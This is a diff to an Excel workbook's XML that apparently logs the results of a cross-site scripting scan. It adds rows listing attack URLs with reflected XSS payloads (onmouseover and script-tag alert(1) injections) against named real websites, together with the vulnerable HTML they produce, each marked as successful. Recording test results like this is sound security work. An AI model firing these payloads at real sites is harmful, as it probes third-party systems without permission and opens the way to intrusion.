--- a/Results/file.xlsx
+++ b/Results/file.xlsx
@@ -5,7 +5,7 @@
   <workbookPr defaultThemeVersion="164011"/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\tbi\Downloads\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\GitHub\My_Project\Results\"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
@@ -19,7 +19,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="164" uniqueCount="40">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="170" uniqueCount="44">
   <si>
     <t>Attack URL</t>
   </si>
@@ -144,6 +144,18 @@
   </si>
   <si>
     <t>https://www.scientificamerican.com/search/?q=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;</t>
+  </si>
+  <si>
+    <t>http://www.corpsport.com/en/packages/search?keyword=" onmouseover="alert(1)&amp;limitstart=0&amp;option=com_virtuemart&amp;view=category&amp;virtuemart_category_id=0</t>
+  </si>
+  <si>
+    <t>&lt;input type="hidden" name="keyword" value="" onmouseover="alert(1)" /&gt;</t>
+  </si>
+  <si>
+    <t>http://www.corpsport.com/en/packages/search?keyword=&amp;limitstart=" onmouseover="alert(1)&amp;option=com_virtuemart&amp;view=category&amp;virtuemart_category_id=0</t>
+  </si>
+  <si>
+    <t>&lt;input type="hidden" name="limitstart" value="" onmouseover="alert(1)" /&gt;</t>
   </si>
 </sst>
 </file>
@@ -462,10 +474,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:D41"/>
+  <dimension ref="A1:D43"/>
   <sheetViews>
     <sheetView tabSelected="1" topLeftCell="A27" workbookViewId="0">
-      <selection activeCell="A43" sqref="A43"/>
+      <selection activeCell="A46" sqref="A46"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -1050,6 +1062,34 @@
         <v>13</v>
       </c>
     </row>
+    <row r="42" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A42" t="s">
+        <v>40</v>
+      </c>
+      <c r="B42" t="s">
+        <v>5</v>
+      </c>
+      <c r="C42" t="b">
+        <v>1</v>
+      </c>
+      <c r="D42" t="s">
+        <v>41</v>
+      </c>
+    </row>
+    <row r="43" spans="1:4" x14ac:dyDescent="0.25">
+      <c r="A43" t="s">
+        <v>42</v>
+      </c>
+      <c r="B43" t="s">
+        <v>5</v>
+      </c>
+      <c r="C43" t="b">
+        <v>1</v>
+      </c>
+      <c r="D43" t="s">
+        <v>43</v>
+      </c>
+    </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>
